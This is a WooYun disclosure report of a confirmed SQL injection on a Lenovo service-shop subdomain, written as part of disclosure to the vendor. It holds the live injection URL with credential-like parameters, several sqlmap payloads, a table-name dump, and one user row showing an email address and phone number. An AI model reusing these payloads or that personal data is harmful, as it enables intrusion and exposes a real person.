当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-035295

漏洞标题:联想安全问题七又有一个分站SQL注射漏洞

相关厂商:联想

漏洞作者: VIP

提交时间:2013-08-26 12:07

修复时间:2013-10-10 12:08

公开时间:2013-10-10 12:08

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-08-26: 细节已通知厂商并且等待厂商处理中
2013-08-26: 厂商已经确认,细节仅向厂商公开
2013-09-05: 细节向核心白帽子及相关领域专家公开
2013-09-15: 细节向普通白帽子公开
2013-09-25: 细节向实习白帽子公开
2013-10-10: 细节向公众公开

简要描述:

找都找不完的漏洞啊 又有一个分站有个注射点 这个点有点隐蔽

详细说明:

注射点:

http://serviceshop.lenovo.com.cn/WebAjaxHelper.ashx?commentsno=ab637223-3828-473c-a2be-058e346ec925&sysun=wsilenovo&sysup=wsi@123lenovo&type=commentsused&_=1377485978815


这是赞同评论的地方 commentsno参数存在漏洞

漏洞证明:

---
Place: GET
Parameter: commentsno
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: commentsno=ab637223-3828-473c-a2be-058e346ec925' AND 9492=9492 AND
'uPDv'='uPDv&sysun=wsilenovo&sysup=wsi@123lenovo&type=commentsused&_=1377485978
15
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: commentsno=ab637223-3828-473c-a2be-058e346ec925'; WAITFOR DELAY '0
0:5'--&sysun=wsilenovo&sysup=wsi@123lenovo&type=commentsused&_=1377485978815
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: commentsno=ab637223-3828-473c-a2be-058e346ec925' WAITFOR DELAY '0:
:5'--&sysun=wsilenovo&sysup=wsi@123lenovo&type=commentsused&_=1377485978815
---


web server operating system: Windows 2003
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008


当前库

current database:    'ServiceShop'


78个表

[11:08:06] [INFO] fetching number of tables for database 'ServiceShop'
[11:08:06] [INFO] resumed: 78


速度比较慢,跑了前面一些表名

[11:08:09] [INFO] resuming partial value: dbo.ACT_Wen
[11:08:12] [INFO] retrieved: dbo.ACT_WenDa
[11:08:12] [INFO] retrieving the length of query output
[11:08:12] [INFO] retrieved: 27
[11:08:30] [INFO] retrieved: dbo.EP_ClassProductRelation
[11:08:30] [INFO] retrieving the length of query output
[11:08:30] [INFO] retrieved: 14
[11:08:43] [INFO] retrieved: dbo.EP_CodeDef
[11:08:43] [INFO] retrieving the length of query output
[11:08:43] [INFO] retrieved: 19
[11:08:56] [INFO] retrieved: dbo.EP_CodeDef_temp
[11:08:56] [INFO] retrieving the length of query output
[11:08:56] [INFO] retrieved: 19
[11:09:11] [INFO] retrieved: dbo.EP_HomePageProd
[11:09:11] [INFO] retrieving the length of query output
[11:09:11] [INFO] retrieved: 15
[11:09:23] [INFO] retrieved: dbo.EP_PassCode
[11:09:23] [INFO] retrieving the length of query output
[11:09:23] [INFO] retrieved: 20
[11:09:39] [INFO] retrieved: dbo.EP_PassCode_temp
[11:09:39] [INFO] retrieving the length of query output
[11:09:39] [INFO] retrieved: 16
[11:09:52] [INFO] retrieved: dbo.EP_Promotion
[11:09:52] [INFO] retrieving the length of query output
[11:09:52] [INFO] retrieved: 21
[11:10:09] [INFO] retrieved: dbo.EP_Promotion_temp
[11:10:09] [INFO] retrieving the length of query output
[11:10:09] [INFO] retrieved: 23
[11:10:25] [INFO] retrieved: dbo.EP_PromotionProduct
[11:10:25] [INFO] retrieving the length of query output
[11:10:25] [INFO] retrieved: 28
[11:10:45] [INFO] retrieved: dbo.EP_PromotionProduct_temp 2
[11:10:45] [INFO] retrieving the length of query output
[11:10:45] [INFO] retrieved: 26
[11:11:07] [INFO] retrieved: dbo.EP_ServiceProductPrice
[11:11:07] [INFO] retrieving the length of query output
[11:11:07] [INFO] retrieved: 31
[11:11:28] [INFO] retrieved: dbo.EP_ServiceProductPrice_tem
[11:11:28] [INFO] retrieving the length of query output
[11:11:28] [INFO] retrieved: 24
[11:11:44] [INFO] retrieved: dbo.EP_ServicePro_uctRel 23/24
[11:12:03] [INFO] heuristics detected web page charset 'utf
[11:12:03] [INFO] retrieved: dbo.EP_ServiceProcuctRel
[11:12:03] [INFO] retrieving the length of query output
[11:12:03] [INFO] retrieved: 25
[11:12:23] [INFO] retrieved: dbo.EP_ServiceProductSale
[11:12:23] [INFO] retrieving the length of query output
[11:12:23] [INFO] retrieved: 38
[11:12:55] [INFO] retrieved: dbo.EP_ServiceProductSale_bak_
[11:12:55] [INFO] retrieving the length of query output
[11:12:55] [INFO] retrieved: 30
[11:13:13] [INFO] retrieved: dbo.EP_ServiceProductSale_temp
[11:13:13] [INFO] retrieving the length of query output
[11:13:13] [INFO] retrieved: 21
[11:13:29] [INFO] retrieved: dbo.MD_ServiceProduct
[11:13:29] [INFO] retrieving the length of query output
[11:13:29] [INFO] retrieved: 30
[11:14:03] [INFO] retrieved: dbo.MD_ServiceProdubt_20130124
[11:14:03] [INFO] retrieving the length of query output
[11:14:03] [INFO] retrieved: 26
[11:14:26] [INFO] retrieved: dbo.MD_ServiceProduct_temp
[11:14:26] [INFO] retrieving the length of query output
[11:14:26] [INFO] retrieved: 16
[11:14:42] [INFO] retrieved: dbo.SS_Agreement
[11:14:42] [INFO] retrieving the length of query output
[11:14:42] [INFO] retrieved: 18
[11:14:59] [INFO] retrieved: dbo.SS_Attachments
[11:14:59] [INFO] retrieving the length of query output
[11:14:59] [INFO] retrieved: 15
[11:15:13] [INFO] retrieved: dbo.SS_BigClass
[11:15:13] [INFO] retrieving the length of query output
[11:15:13] [INFO] retrieved: 23
[11:15:32] [INFO] retrieved: dbo.SS_BigSmallClassRel
[11:15:32] [INFO] retrieving the length of query output
[11:15:32] [INFO] retrieved: 11
[11:16:01] [INFO] retrieved: cbo.SS_Cart
[11:16:01] [INFO] retrieving the length of query output
[11:16:01] [INFO] retrieved: 15
[11:16:15] [INFO] retrieved: dbo.SS_CartItem
[11:16:15] [INFO] retrieving the length of query output
[11:16:15] [INFO] retrieved: 16
[11:16:28] [INFO] retrieved: dbo.SS_ClassInfo
[11:16:28] [INFO] retrieving the length of query output
[11:16:28] [INFO] retrieved: 19
[11:16:43] [INFO] retrieved: dbo.SS_ClassProduct
[11:16:43] [INFO] retrieving the length of query output
[11:16:43] [INFO] retrieved: 24
[11:17:03] [INFO] retrieved: dbo.SS_ClassPromotionExt
[11:17:03] [INFO] retrieving the length of query output
[11:17:03] [INFO] retrieved: 17
[11:17:16] [INFO] retrieved: dbo.SS_Collection
[11:17:16] [INFO] retrieving the length of query output
[11:17:16] [INFO] retrieved: 15
[11:17:29] [INFO] retrieved: dbo.SS_Delivery
[11:17:29] [INFO] retrieving the length of query output
[11:17:29] [INFO] retrieved: 22
[11:17:47] [INFO] retrieved: dbo.SS_DictionaryValue
[11:17:47] [INFO] retrieving the length of query output
[11:17:47] [INFO] retrieved: 21
[11:18:04] [INFO] retrieved: dbo.SS_DiscountRecord
[11:18:04] [INFO] retrieving the length of query output
[11:18:04] [INFO] retrieved: 15
[11:18:17] [INFO] retrieved: dbo.SS_ErrorLog
[11:18:17] [INFO] retrieving the length of query output
[11:18:17] [INFO] retrieved: 17
[11:18:31] [INFO] retrieved: dbo.SS_Evaluation
[11:18:31] [INFO] retrieving the length of query output
[11:18:31] [INFO] retrieved: 22
[11:18:50] [INFO] retrieved: dbo.SS_EvaluationReply
[11:18:50] [INFO] retrieving the length of query output
[11:18:50] [INFO] retrieved: 14
[11:19:02] [INFO] retrieved: dbo.SS_Explain
[11:19:02] [INFO] retrieving the length of query output
[11:19:02] [INFO] retrieved: 15
[11:19:15] [INFO] retrieved: dbo.SS_FeedBack
[11:19:15] [INFO] retrieving the length of query output
[11:19:15] [INFO] retrieved: 16
[11:19:28] [INFO] retrieved: dbo.SS_GroupInfo
[11:19:28] [INFO] retrieving the length of query output
[11:19:28] [INFO] retrieved: 19
[11:19:43] [INFO] retrieved: dbo.SS_GroupProduct
[11:19:43] [INFO] retrieving the length of query output
[11:19:43] [INFO] retrieved: 20
[11:19:59] [INFO] retrieved: dbo.SS_GroupPurchase
[11:19:59] [INFO] retrieving the length of query output
[11:19:59] [INFO] retrieved: 14
[11:20:11] [INFO] retrieved: dbo.SS_Invoice
[11:20:11] [INFO] retrieving the length of query output
[11:20:11] [INFO] retrieved: 15
[11:20:25] [INFO] retrieved: dbo.SS_LimitBuy
[11:20:25] [INFO] retrieving the length of query output
[11:20:25] [INFO] retrieved: 15
[11:20:37] [INFO] retrieved: dbo.SS_LoginLog
[11:20:37] [INFO] retrieving the length of query output
[11:20:37] [INFO] retrieved: 17
[11:20:51] [INFO] retrieved: dbo.SS_MyDiscount
[11:20:51] [INFO] retrieving the length of query output
[11:20:51] [INFO] retrieved: 11
[11:21:02] [INFO] retrieved: dbo.SS_News
[11:21:03] [INFO] retrieving the length of query output
[11:21:03] [INFO] retrieved: 13
[11:21:14] [INFO] retrieved: dbo.SS_PayLog
[11:21:14] [INFO] retrieving the length of query output
[11:21:14] [INFO] retrieved: 21
[11:21:32] [INFO] retrieved: dbo.SS_PointsDiscount
[11:21:32] [INFO] retrieving the length of query output
[11:21:32] [INFO] retrieved: 19
[11:21:47] [INFO] retrieved: dbo.SS_PointsRecord
[11:21:47] [INFO] retrieving the length of query output
[11:21:47] [INFO] retrieved: 17
[11:22:01] [INFO] retrieved: dbo.SS_PointsRule
[11:22:01] [INFO] retrieving the length of query output
[11:22:01] [INFO] retrieved: 18
[11:22:15] [INFO] retrieved: dbo.SS_PromExtItem
[11:22:15] [INFO] retrieving the length of query output
[11:22:15] [INFO] retrieved: 19
[11:22:30] [INFO] retrieved: dbo.SS_PromotionExt
[11:22:31] [INFO] retrieving the length of query output
[11:22:31] [INFO] retrieved: 16
[11:22:49] [INFO] retrieved: dbo.SS_SaleOrder
[11:22:49] [INFO] retrieving the length of query output
[11:22:49] [INFO] retrieved: 20
[11:23:05] [INFO] retrieved: dbo.SS_SaleOrderLine
[11:23:05] [INFO] retrieving the length of query output
[11:23:05] [INFO] retrieved: 22
[11:23:23] [INFO] retrieved: dbo.SS_SerchDictionary
[11:23:23] [INFO] retrieving the length of query output
[11:23:23] [INFO] retrieved: 19
[11:23:40] [INFO] retrieved: dbo.SS_ServiceLucky
[11:23:40] [INFO] retrieving the length of query output
[11:23:40] [INFO] retrieved: 25
[11:23:59] [INFO] retrieved: dbo.SS_ServicePrizeDetail
[11:23:59] [INFO] retrieving the length of query output
[11:23:59] [INFO] retrieved: 30
[11:24:21] [INFO] retrieved: dbo.SS_ServiceProductAgreement
[11:24:21] [INFO] retrieving the length of query output
[11:24:21] [INFO] retrieved: 24
[11:24:39] [INFO] retrieved: dbo.SS_ServiceProductExt
[11:24:39] [INFO] retrieving the length of query output
[11:24:39] [INFO] retrieved: 17
[11:24:54] [INFO] retrieved: dbo.SS_SmallClass
[11:24:54] [INFO] retrieving the length of query output
[11:24:54] [INFO] retrieved: 24
[11:25:13] [INFO] retrieved: dbo.SS_SmallClassProduct
[11:25:13] [INFO] retrieving the length of query output
[11:25:13] [INFO] retrieved: 17
[11:25:27] [INFO] retrieved: dbo.SS_UserPoints
[11:25:27] [INFO] retrieving the length of query output
[11:25:27] [INFO] retrieved: 12
[11:25:38] [INFO] retrieved: dbo.SS_Value
[11:25:39] [INFO] retrieving the length of query output
[11:25:39] [INFO] retrieved: 15
[11:25:50] [INFO] retrieved: dbo.SS_VIP_User
[11:25:51] [INFO] retrieving the length of query output
[11:25:51] [INFO] retrieved: 15
[11:26:02] [INFO] retrieved: dbo.SS_VisitLog
[11:26:02] [INFO] retrieving the length of query output
[11:26:02] [INFO] retrieved: 29
[11:26:20] [INFO] retrieved: dbo.SS_VM_GroupPurchase_Order
[11:26:20] [INFO] retrieving the length of query output
[11:26:20] [INFO] retrieved: 27
[11:26:38] [INFO] retrieved: dbo.SS_VM_LimitBuy_cs_Order
[11:26:38] [INFO] retrieving the length of query output
[11:26:38] [INFO] retrieved: 30
[11:26:59] [INFO] retrieved: dbo.SS_VW_BianJiBuChongProduct
[11:26:59] [INFO] retrieving the length of query output
[11:26:59] [INFO] retrieved: 20
[11:27:14] [INFO] retrieved: dbo.SS_VW_Evaluation
[11:27:14] [INFO] retrieving the length of query output
[11:27:15] [INFO] retrieved: 22
[11:27:31] [INFO] retrieved: dbo.SS_VW_GroupProduct


跑VIP用户表的第一条数据

+----+------+---------------------+--------+-------------+---------+---------+--
-------+----------+----------+----------+-----------+-------------+-------------
+--------------+
| id | name | email               | status | mobile      | count   | station | c
leaned | order_no | username | buy_time | update_ip | remote_code | update_time
| cleaned_time |
+----+------+---------------------+--------+-------------+---------+---------+--
-------+----------+----------+----------+-----------+-------------+-------------
+--------------+
| 1  | ??   | tonymemory@yahoo.cn | ??     | 13520328797 |
+----+------+---------------------+--------+-------------+---------+---------+--
-------+----------+----------+----------+-----------+-------------+-------------
+--------------+

修复方案:

过滤哦

版权声明:转载请注明来源 VIP@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-08-26 14:39

厂商回复:

感谢您对联想安全做出的贡献!我们将立即评估与修复相关漏洞

最新状态:

暂无

漏洞评价:

评论

  1. 2013-08-26 12:21 | sex is not show 认证白帽子 ( 普通白帽子 | Rank:1495 漏洞数:233 | 这家伙真懒!)

    这是在连载啊~~

  2. 2013-08-26 12:24 | VIP ( 普通白帽子 | Rank:759 漏洞数:100 )

    @sex is not show 嗯

  3. 2013-08-26 12:24 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    mark

  4. 2013-08-26 12:24 | 带馅儿馒头 ( 普通白帽子 | Rank:1278 漏洞数:143 | 心在,梦在)

    @VIP 骚年,联想要你联系方式了没?

  5. 2013-08-26 12:24 | VIP ( 普通白帽子 | Rank:759 漏洞数:100 )

    @带馅儿馒头 没有啊

  6. 2013-08-26 12:25 | 78基佬 ( 实习白帽子 | Rank:84 漏洞数:20 | 不会日站的设计师不是好产品经理)

    围观最高分实习!

  7. 2013-08-26 12:27 | 带馅儿馒头 ( 普通白帽子 | Rank:1278 漏洞数:143 | 心在,梦在)

    @VIP 这是不发礼物的节奏么,也没问我要呀,,,

  8. 2013-08-26 12:34 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    联想的童鞋要被虐死了...

  9. 2013-08-26 12:35 | sex is not show 认证白帽子 ( 普通白帽子 | Rank:1495 漏洞数:233 | 这家伙真懒!)

    @VIP 联想在发礼物,目测你下一批会有大礼物~~

  10. 2013-08-26 12:49 | 养乐多Ngan ( 普通白帽子 | Rank:652 漏洞数:72 | Hello,world.其实最大的漏洞,是人心。)

    我就找到一个。。你找到7个。。。实力的差距啊。。。

  11. 2013-08-26 13:10 | 小痞子 ( 普通白帽子 | Rank:106 漏洞数:21 | <xss>alert("a")</xss>¥&@&……dssKhwjcw...)

    这是忽略的节奏~~·

  12. 2013-08-26 13:18 | VIP ( 普通白帽子 | Rank:759 漏洞数:100 )

    @小痞子 这是给20rank的节奏 赌wb吗

  13. 2013-08-26 13:30 | 淡漠天空 认证白帽子 ( 实习白帽子 | Rank:1113 漏洞数:142 | M:出售GOV STATE NSA CIA NASA DHS Symant...)

    联想 prm系统和oa 搞了么 没搞你可以继续连载

  14. 2013-08-26 13:49 | 小痞子 ( 普通白帽子 | Rank:106 漏洞数:21 | <xss>alert("a")</xss>¥&@&……dssKhwjcw...)

    @VIP 分站注入 20rank 不现实啊 我拿z7y 大大的全部wb 跟你赌

  15. 2013-08-26 15:32 | 淡漠天空 认证白帽子 ( 实习白帽子 | Rank:1113 漏洞数:142 | M:出售GOV STATE NSA CIA NASA DHS Symant...)

    @VIP 15rank

  16. 2013-08-26 16:56 | 小痞子 ( 普通白帽子 | Rank:106 漏洞数:21 | <xss>alert("a")</xss>¥&@&……dssKhwjcw...)

    不输不赢~~ 扯平了 下次继续